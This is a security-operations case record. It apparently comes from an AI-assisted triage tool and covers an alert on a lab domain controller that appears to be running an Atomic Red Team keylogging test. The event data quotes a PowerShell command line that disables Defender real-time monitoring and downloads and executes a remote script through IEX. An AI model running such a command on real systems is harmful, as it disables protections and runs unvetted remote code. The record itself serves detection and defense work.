โ
Case #488
managed.Malicious PowerShell Commandlets - ProcessCreation
๐ท๏ธ Analyst Verdict Classification
SUSPICIOUS by analyst๐ค AI Analysis
๐ Detections (1)
Malicious PowerShell Commandlets - ProcessCreation
high
Rule: managed.Malicious PowerShell Commandlets - ProcessCreation
Hostname: df-labsdc01.dflabs.local ยท Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 88% ยท Verdict: suspicious
Event Data:
COMMAND_LINE:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path \""C:\AtomicRedTeam\atomics\T1056.001\src\Get-Keystrokes.ps1\"") {exit 0} else {exit 1}}
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
40960
PARENT:
{'BASE_ADDRESS': 140694944940032, 'COMMAND_LINE': "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ", 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', 'HASH': 'de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c', 'MEMORY_USAGE': 193449984, 'PARENT_ATOM': '0c13305cb3f73d15515e789969c2a835', 'PARENT_PROCESS_ID': 2440, 'PROCESS_ID': 3164, 'THIS_ATOM': '6b593eddb775332b5050941f69c2a838', 'THREADS': 32, 'TIMESTAMP': 1774364726507, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
3164
PROCESS_ID:
7520
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs:
{'type': 'command_line', 'value': '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" & {if (Test-Path \\"C:\\AtomicRedTeam\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1\\") {exit 0} else {exit 1}}'}
{'type': 'file_path', 'value': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'}
MITRE:
T1056.001
T1567.001
T1563.002
Analyst Declaration:
๐ Raw Detection JSON
{
"author": "_ext-snapattack-bef4337c-2507-4428-bce6-8021ba80d7c4[bulk][segment]",
"cat": "Malicious PowerShell Commandlets - ProcessCreation",
"detect": {
"event": {
"COMMAND_LINE": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \u0026 {if (Test-Path \\\"\"C:\\AtomicRedTeam\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1\\\"\") {exit 0} else {exit 1}} ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"MEMORY_USAGE": 40960,
"PARENT": {
"BASE_ADDRESS": 140694944940032,
"COMMAND_LINE": "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"MEMORY_USAGE": 193449984,
"PARENT_ATOM": "0c13305cb3f73d15515e789969c2a835",
"PARENT_PROCESS_ID": 2440,
"PROCESS_ID": 3164,
"THIS_ATOM": "6b593eddb775332b5050941f69c2a838",
"THREADS": 32,
"TIMESTAMP": 1774364726507,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"PARENT_PROCESS_ID": 3164,
"PROCESS_ID": 7520,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"routing": {
"arch": 2,
"did": "",
"event_id": "f886ac72-7b91-43db-9f5e-1ef21be158c9",
"event_time": 1774364762965,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 1318,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "6b593eddb775332b5050941f69c2a838",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "fd518bcba64488e9b505f45c69c2a85b"
}
},
"detect_id": "d403600d-5267-4c9b-8271-3f4169c2a85c",
"detect_mtd": {
"author": "Nasreddine Bencherchali (Nextron Systems)",
"description": "Detects Commandlet names from well-known PowerShell exploitation frameworks",
"falsepositives": [
"Unknown"
],
"level": "high",
"references": [
"https://adsecurity.org/?p=2921",
"https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
"https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
"https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
"https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
"https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
"https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
"https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
"https://github.com/calebstewart/CVE-2021-1675",
"https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
"https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
"https://github.com/HarmJ0y/DAMP",
"https://github.com/samratashok/nishang",
"https://github.com/DarkCoderSc/PowerRunAsSystem/",
"https://github.com/besimorhino/powercat",
"https://github.com/Kevin-Robertson/Powermad",
"https://github.com/adrecon/ADRecon",
"https://github.com/adrecon/AzureADRecon",
"https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1"
],
"snapattack_analytic_guid": "d48d9380-c5ae-495a-9274-c5fbdeb10e15",
"tags": [
"attack.execution",
"attack.discovery",
"attack.t1482",
"attack.t1087",
"attack.t1087.001",
"attack.t1087.002",
"attack.t1069.001",
"attack.t1069.002",
"attack.t1069",
"attack.t1059.001"
]
},
"gen_time": 1774364764284,
"link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364762\u0026selected=fd518bcba64488e9b505f45c69c2a85b",
"namespace": "general",
"routing": {
"arch": 2,
"did": "",
"event_id": "f886ac72-7b91-43db-9f5e-1ef21be158c9",
"event_time": 1774364762965,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 1318,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "6b593eddb775332b5050941f69c2a838",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "fd518bcba64488e9b505f45c69c2a85b"
},
"rule_tags": [
"ext:ext-snapattack",
"attack.execution",
"attack.discovery",
"attack.t1482",
"attack.t1087",
"attack.t1087.001",
"attack.t1087.002",
"attack.t1069.001",
"attack.t1069.002",
"attack.t1069",
"attack.t1059.001"
],
"source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
"source_rule": "managed.Malicious PowerShell Commandlets - ProcessCreation",
"ts": 1774364764000
}
๐ Threat Intel JSON
{
"virustotal": {
"malicious": false,
"provider": "virustotal",
"reputation": 73,
"stats": {
"confirmed-timeout": 0,
"failure": 0,
"harmless": 0,
"malicious": 0,
"suspicious": 0,
"timeout": 0,
"type-unsupported": 4,
"undetected": 72
}
}
}
๐ค Triage JSON
{
"confidence": 0.875,
"false_positive_reason": null,
"investigation_questions": [
"What triggered the execution of these commands?",
"Are there other processes running in the same process tree?",
"Has the host been accessed remotely recently?"
],
"ioc_analysis": "The file path C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is a known-good system binary, which initially suggests benignity. However, the command line arguments reveal execution of ART\u0027s T1056.001 (Keylogging) test suite and commands to disable real-time monitoring via Set-MpPreference. The hash matches the legitimate powershell.exe binary, but the context of execution is malicious.",
"iocs_extracted": [
{
"type": "command_line",
"value": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \u0026 {if (Test-Path \\\"C:\\AtomicRedTeam\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1\\\") {exit 0} else {exit 1}}"
},
{
"type": "file_path",
"value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
}
],
"mitre_techniques": [
"T1056.001",
"T1567.001",
"T1563.002"
],
"recommended_actions": [
"Manual analyst review required \u2014 AI models (split)",
"Isolate the host immediately to prevent credential theft or further lateral movement.",
"Review recent authentication logs for SYSTEM account activity.",
"Check for persistence mechanisms installed by ART tools.",
"Analyze network traffic for outbound connections from this session."
],
"risk_score": 90,
"severity": "high",
"summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious execution of Atomic Red Team (ART) automation scripts under SYSTEM privileges. The process is running legitimate PowerShell but executing commands designed to test for credential harvesting and disable security controls.\n\n**IOC Analysis:** The file path C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is a known-good system binary, which initially suggests benignity. However, the command line arguments reveal execution of ART\u0027s T1056.001 (Keylogging) test suite and commands to disable real-time monitoring via Set-MpPreference. The hash matches the legitimate powershell.exe binary, but the context of execution is malicious.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.8\nThe detection event involves a PowerShell process running as the SYSTEM account with a suspicious command line that checks for and potentially executes a script from Atomic Red Team, a tool often used in attack simulations. While the process itself is legitimate and signed, the commands indicate malicious intent, such as installing packages and running attack tests.\n\n**IOC Analysis:** The FILE_PATH points to a legitimate Microsoft-signed PowerShell executable in the System32 directory, which is generally benign. However, the HASH is valid for a signed binary, but the COMMAND_LINE contains suspicious elements like installing NuGet and downloading scripts from GitHub, which are common in malicious activities. The parent process also shows similar suspicious behavior, raising concerns.",
"verdict": "suspicious",
"voting": {
"auto_action": "manual_review",
"mode": "split",
"total_models": 2,
"vote_summary": [
"qwen3.5:4b: true_positive (critical, 95% confidence)",
"deepseek-r1:8b: suspicious (high, 80% confidence)"
],
"votes": [
{
"confidence": 0.95,
"model": "qwen3.5:4b",
"verdict": "true_positive"
},
{
"confidence": 0.8,
"model": "deepseek-r1:8b",
"verdict": "suspicious"
}
],
"winning_count": 1,
"winning_verdict": "suspicious"
}
}
โ๏ธ Response Actions
| Action | Target | Status | Result | |
|---|---|---|---|---|
| tag | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | Lateral Movement Investigation: 50 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | Persistence Check: 0 events found | ||
| recommended | executed | Network Activity Investigation: 50 events found |
๐ Add Note
๐ฌ Notes (6)
๐ค FusionSOC AI
2026-03-24T15:41
๐ค FusionSOC AI
2026-03-24T15:41
๐ค FusionSOC AI
2026-03-24T15:41
๐ค FusionSOC AI
2026-03-24T15:41
๐ค FusionSOC AI
2026-03-24T15:41
๐ค FusionSOC AI
2026-03-24T15:41
๐ Timeline
2026-03-24T16:06:27
analyst
Status changed: investigating โ closed
2026-03-24T16:06:25
analyst
Analyst classified as Suspicious (SUSPICIOUS)
2026-03-24T15:41:07
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T15:41:07
FusionSOC
Action recommended โ executed: Network Activity Investigation: 50 events found
2026-03-24T15:41:07
FusionSOC AI
Note by FusionSOC AI: ## ๐ Network Activity Investigation **Action:** Analyze network traffic for outbound connections from this session. **Se...
2026-03-24T15:41:06
FusionSOC
Response action queued: recommended on Analyze network traffic for outbound connections from this session.
2026-03-24T15:41:06
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T15:41:06
FusionSOC
Action recommended โ executed: Persistence Check: 0 events found
2026-03-24T15:41:06
FusionSOC AI
Note by FusionSOC AI: ## ๐ Persistence Check **Action:** Check for persistence mechanisms installed by ART tools. **Sensor:** `e4a1c62d-4d1f-4...
2026-03-24T15:41:05
FusionSOC
Response action queued: recommended on Check for persistence mechanisms installed by ART tools.
2026-03-24T15:41:05
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T15:41:05
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T15:41:05
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Review recent authentication logs for SYSTEM account activity. **Sensor:** `e4a1...
2026-03-24T15:41:05
FusionSOC
Response action queued: recommended on Review recent authentication logs for SYSTEM account activity.
2026-03-24T15:41:05
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T15:41:05
FusionSOC
Action recommended โ executed: Lateral Movement Investigation: 50 events found
2026-03-24T15:41:05
FusionSOC AI
Note by FusionSOC AI: ## ๐ Lateral Movement Investigation **Action:** Isolate the host immediately to prevent credential theft or further late...
2026-03-24T15:41:04
FusionSOC
Response action queued: recommended on Isolate the host immediately to prevent credential theft or further lateral movement.
2026-03-24T15:41:04
FusionSOC AI
Status changed: open โ investigating
2026-03-24T15:41:04
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T15:41:04
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Manual analyst review required โ AI models (split) **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T15:41:03
FusionSOC
Response action queued: recommended on Manual analyst review required โ AI models (split)
2026-03-24T15:41:03
FusionSOC
Action tag โ failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T15:41:03
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T15:41:03
FusionSOC AI
Detection d403600d-5267-4c9b-8271-3f4169c2a85c triaged as suspicious (high severity, confidence: 88%)
2026-03-24T15:41:03
FusionSOC AI
Case created from detection: managed.Malicious PowerShell Commandlets - ProcessCreation